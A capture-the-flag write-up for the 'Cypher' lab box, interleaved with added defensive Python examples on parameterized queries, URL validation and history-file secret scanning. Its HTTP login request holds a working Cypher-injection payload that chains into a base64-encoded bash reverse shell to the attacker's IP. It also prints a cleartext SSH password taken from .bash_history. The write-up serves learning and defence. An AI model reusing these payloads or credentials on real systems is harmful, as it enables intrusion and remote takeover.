Cypher

10.10.11.57

nmap

# Nmap 7.95 scan initiated Wed Apr 16 12:02:01 2025 as: nmap -e utun4 -sC -sV -vv -oA nmap/default 10.10.11.57
Nmap scan report for 10.10.11.57
Host is up, received echo-reply ttl 63 (0.14s latency).
Scanned at 2025-04-16 12:02:14 CST for 22s
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 9.6p1 Ubuntu 3ubuntu13.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 be:68:db:82:8e:63:32:45:54:46:b7:08:7b:3b:52:b0 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMurODrr5ER4wj9mB2tWhXcLIcrm4Bo1lIEufLYIEBVY4h4ZROFj2+WFnXlGNqLG6ZB+DWQHRgG/6wg71wcElxA=
| 256 e5:5b:34:f5:54:43:93:f8:7e:b6:69:4c:ac:d6:3d:23 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEqadcsjXAxI3uSmNBA8HUMR3L4lTaePj3o6vhgPuPTi
80/tcp open http syn-ack ttl 63 nginx 1.24.0 (Ubuntu)
|_http-server-header: nginx/1.24.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://cypher.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /opt/homebrew/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Apr 16 12:02:36 2025 -- 1 IP address (1 host up) scanned in 35.38 seconds

Add cypher.htb to the hosts file.

fuzzing

ffuf
api
testing

Download the .jar and import it into jadx to read the source.

Port 80 site

cypher-injection
The login form has a Cypher injection.
result
9f54ca4c130be6d529a56dee59dc2b2090e43ac could not be cracked.
jadx-result
The custom extension has a command injection vulnerability; build a payload to execute commands.
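Why the login query was injectable, and what the non-injectable form looks like, as an added Python example (not code from the box or this writeup). The query shape, the parameter style and the log record format are assumptions; no database is contacted. The detector at the end flags submitted usernames that carry Cypher syntax, which is the kind of check a WAF rule or login-audit job would run over the request the writeup sends.

```python
"""Added example, not code from the writeup or the target application.
Shows why the login was injectable (query text built from user input) and
the parameterized form that is not, plus a small detector that flags
login attempts whose username carries Cypher syntax. The query shape and
the record format are assumptions; no database is contacted."""
import re

# Assumed shape of the login lookup: return the stored SHA1 for a username.
_SAFE_QUERY = (
    "MATCH (u:USER)-[:SECRET]->(h:SHA1) "
    "WHERE u.name = $username RETURN h.value AS hash"
)


def build_vulnerable_query(username):
    """The defect: the username is spliced into the query text, so a quote
    closes the string literal and anything after it is parsed as Cypher."""
    return (
        "MATCH (u:USER)-[:SECRET]->(h:SHA1) "
        "WHERE u.name = '" + username + "' RETURN h.value AS hash"
    )


def build_parameterized_query(username):
    """The fix: query text is constant; the value travels as a driver
    parameter ($username) and can never change the query's structure.
    With the neo4j Python driver this is session.run(query, **params)."""
    return _SAFE_QUERY, {"username": username}


# Cypher keywords and comment/quote-break sequences that do not belong in a
# login name. Matched against the submitted value, not the query text.
_INJECTION_MARKERS = re.compile(
    r"\b(RETURN|UNION|CALL|YIELD|MATCH|LOAD\s+CSV)\b|//|'\s*OR\s",
    re.IGNORECASE,
)


def looks_like_cypher_injection(value):
    """True when a submitted field contains Cypher syntax markers."""
    return bool(_INJECTION_MARKERS.search(value))


def flag_login_attempts(records):
    """records: iterable of dicts with 'ts', 'src', 'username' (constructed
    format). Returns the records whose username looks like an injection."""
    return [r for r in records if looks_like_cypher_injection(r["username"])]


if __name__ == "__main__":
    sample = [  # constructed sample log records
        {"ts": "2025-04-16T12:10:01", "src": "10.10.16.22",
         "username": "admin' or 1=1 \n RETURN h.value as hash //"},
        {"ts": "2025-04-16T12:10:05", "src": "10.10.16.9", "username": "alice"},
    ]
    for r in flag_login_attempts(sample):
        print("suspicious login from", r["src"], repr(r["username"]))
```

The detector is a heuristic: a keyword on its own is only an indicator, and the real fix is the parameterized query, which makes the input inert regardless of what it contains.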

POST /api/auth HTTP/1.1
Host: cypher.htb
Content-Length: 236
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Origin: http://cypher.htb
Referer: http://cypher.htb/login
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive

{"username":"admin' or 1=1 \n RETURN h.value as hash union CALL custom.getUrlStatusCode('http://10.10.16.22:8001 && echo YmFzaCAtYyAnYmFzaCAtaSAgPiYgL2Rldi90Y3AvMTAuMTAuMTYuMjIvOTAwMSAgMD4mMSAn|base64 -d|bash') \n yield statusCode as value \n RETURN value as hash//","password":"123456"}
shell
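The command injection in the custom procedure, as an added Python example (not the extension's code or this writeup's). It assumes the procedure built one shell command string around the caller-supplied URL; the vulnerable shape is shown next to a version that validates the URL and runs the fetch as an argv list with no shell. Function names are hypothetical. The validator also refuses private and loopback targets, because a URL-fetching database procedure is an SSRF pivot even after the shell is removed.

```python
"""Added example, not the extension's code or the writeup's. The custom
procedure is assumed to have built a shell command string around the
caller-supplied URL; this shows that shape beside a version that validates
the URL and runs the fetch without a shell. Names are hypothetical."""
import ipaddress
import re
import subprocess
from urllib.parse import urlsplit

_SHELL_META = set(" \t\n;&|$`<>(){}'\"\\")
_HOST_RE = re.compile(
    r"^[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])?)*$"
)


def build_shell_command(url):
    """The vulnerable shape (assumed): one string handed to a shell, so a
    URL containing '&&' appends a second command."""
    return "curl -s -o /dev/null -w '%{http_code}' " + url


def is_safe_url(url):
    """Accept only http(s) URLs with a plain hostname or public IP, a numeric
    port and no shell metacharacters. Refuses private, loopback and
    link-local targets (SSRF)."""
    if any(c in _SHELL_META for c in url):
        return False
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    try:
        parts.port  # raises ValueError when the port is not numeric
    except ValueError:
        return False
    try:
        ip = ipaddress.ip_address(parts.hostname)
    except ValueError:
        # not an IP literal: require a syntactically plain hostname
        return bool(_HOST_RE.match(parts.hostname))
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_reserved or ip.is_multicast)


def build_argv(url):
    """The fix: argv list, no shell. The URL is a single argument after
    '--', so nothing in it is read as an option or a command separator."""
    if not is_safe_url(url):
        raise ValueError("rejected URL: %r" % url)
    return ["curl", "-s", "-o", "/dev/null", "-w", "%{http_code}", "--", url]


def get_url_status_code(url, timeout=10):
    """Hardened equivalent of the procedure: validate, then exec directly."""
    out = subprocess.run(build_argv(url), capture_output=True, text=True,
                         timeout=timeout, check=False)
    return out.stdout.strip()


if __name__ == "__main__":
    bad = "http://10.10.16.22:8001 && id"  # shape of the writeup's payload
    print("shell string:", build_shell_command(bad))
    print("accepted?", is_safe_url(bad), is_safe_url("https://example.com/"))
```

A Java extension would apply the same two rules: never pass a user-controlled value through `Runtime.exec(String)` or a shell, and validate the URL (scheme, host class, port) before fetching it.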

.bash_history is, surprisingly, not linked to /dev/null; take a look.
bash-history

neo4j-admin dbms set-initial-password cU4btyib.20xtCMCXkBmerhK

Logging in over SSH with graphasm:cU4btyib.20xtCMCXkBmerhK succeeds.
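The history file handed over a password on a command line. The following is an added Python example (not from the writeup) of the audit a defender would run over shell history files: each offending line is reported with the secret masked, so the finding itself does not leak it. The rules and the sample history are constructed; only the neo4j-admin line reproduces what the writeup shows.

```python
"""Added example, not from the writeup. Scans a shell history file for
commands that embed a credential on the command line, the way the box's
.bash_history held the neo4j-admin initial-password command. Rules and the
sample history are constructed; line 2 is the one the writeup shows."""
import re

# (rule name, pattern whose group 1 is the secret value)
RULES = [
    ("neo4j-initial-password",
     re.compile(r"set-initial-password\s+(\S+)")),
    ("cli-password-flag",
     re.compile(r"(?<!\S)(?:--password[= ]|-p)(\S+)")),
    ("env-secret",
     re.compile(r"\b\w*(?:PASSWORD|SECRET|TOKEN|API_KEY)\w*=(\S+)",
                re.IGNORECASE)),
]

# Constructed sample .bash_history; line 2 reproduces the writeup's finding.
SAMPLE_HISTORY = """\
ls -la
neo4j-admin dbms set-initial-password cU4btyib.20xtCMCXkBmerhK
cd /var/lib/neo4j
mysql -u root -pSuperSecret123 appdb
export DB_PASSWORD=hunter2
vim notes.txt
"""


def redact(match):
    """Return the matched command with the secret (group 1) masked."""
    s = match.string
    return s[:match.start(1)] + "***" + s[match.end(1):]


def scan_history(text):
    """One finding per offending line: line number, rule name and the
    redacted command. The cleartext secret is never stored in the result."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, pattern in RULES:
            m = pattern.search(line)
            if m:
                findings.append({"line": lineno, "rule": name,
                                 "command": redact(m)})
                break  # first matching rule wins
    return findings


if __name__ == "__main__":
    for f in scan_history(SAMPLE_HISTORY):
        print("line %d [%s]: %s" % (f["line"], f["rule"], f["command"]))
```

Running it across every user's history (and over `/root`) catches exactly the class of finding used here; the companion control is to set `HISTCONTROL=ignorespace` or clear history after one-off credential commands.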

Privilege escalation

sudo
rules

By pointing the sudo-allowed tool at a custom rules file and enabling debug output, files can be read with root privileges.
root-flag